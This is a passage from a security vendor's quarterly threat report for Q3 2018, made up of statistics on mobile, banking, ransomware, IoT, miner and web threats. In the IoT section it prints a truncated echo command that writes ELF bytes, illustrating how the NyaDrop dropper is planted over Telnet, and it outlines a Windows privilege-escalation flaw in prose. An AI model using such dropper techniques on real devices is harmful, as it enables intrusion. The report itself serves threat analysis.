actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. \n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 less packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2,74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1,77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>)..\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n| | \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. \n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. \n \nTelnet | 99,4% \nSSH | 0,6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32. Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1,99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n| | | | | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.\n\n_Geography of local malware attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "cvss3": {}, "published": "2018-11-12T10:00:55", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "modified": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-15T21:13:49", "description": 